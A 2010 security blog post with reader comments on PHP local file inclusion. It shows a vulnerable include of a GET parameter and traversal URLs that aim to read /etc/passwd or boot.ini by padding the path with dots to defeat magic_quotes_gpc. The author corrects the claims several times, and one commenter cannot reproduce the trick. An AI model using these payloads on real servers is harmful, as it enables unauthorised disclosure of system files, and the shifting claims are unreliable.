So, lets look at a piece of code:
<?php include(’inc/’.$_GET['page'].’php’); ?>
Normally, you would use the null byte (%00) to exploit it:
vuln.php?page=../../../../../etc/passwd%00
but if magic_quote_gpc is enabled than the null byte(%00) will get converted to /0, implying that the attack will fail.
How to bypass this: it you add a large number of dots (…..) than the null byte will not get escaped null byte is not required. e.g.
vuln.php?
page=../../../../../etc/passwd%00……………………………………………………………………..(200 dots in this case)
vuln.php?page=../../../../../etc/passwd……………………………………………………………………..(200 dots in this case)
Correction: You don’t need null byte here.
Update: As pointed out by Bodgan, this only works for windows. So replace /etc/passwd with /../../boot.ini. I will provide a POC link
tested on php version: 5.2.12 (wamp environment)
References: http://www.xakep.ru/post/50862/novaya_veha_v_teorii_include.rar
11:45 am on February 2nd, 2010
Good one Sid!
12:04 pm on February 2nd, 2010
i wanna see a printscreen
12:13 pm on February 2nd, 2010
No, it’s not about the null byte. It works like this vuln.php?page=../../../../../etc/passwd….(lots of dots). With the null byte it doesn’t work.
It only works on Windows AND it only works if the include is relative.
If you have something like:
include “d:\\xampp\\htdocs\\test\\” . $_GET['i'] . “.txt”; it doesn’t work.
12:18 pm on February 2nd, 2010
Hi Bogan,
i have only tested it on windows, while the backslash(\) will get escaped by magic quote the forward slash will not be escaped, so that explains why it will only work if include is relational in windows.
I can confirm that in my windows setup, it worked with null byte. As you pointed out, it doesn’t work with null byte and the null byte is actually not required.4:07 pm on February 2nd, 2010
Hi,
Very interesting only I am not able to reproduce it. I tested from 100 to > 4096 dots, this does not disable the NULL byte from being escaped.
You say you tested on WAMP ? ie: Windows ? How can /etc/passwd work on windows ?
I tried in windows also, and it failed. Could you please explain or give poc code ?
Thanks
4:16 pm on February 2nd, 2010
Hi skully, please see the update, you dont need magic quote at all. I managed to make so many mistakes in a small blog post
6:16 am on February 3rd, 2010
Similar stuff is possible on linux: http://www.ush.it/2009/02/08/php-filesystem-attack-vectors/
2:28 pm on February 8th, 2010
[...] Local File Inclusion with Magic_quotes_gpc enabled – notsosecure.com Penetration using magic_quote_gpc and PHP [...]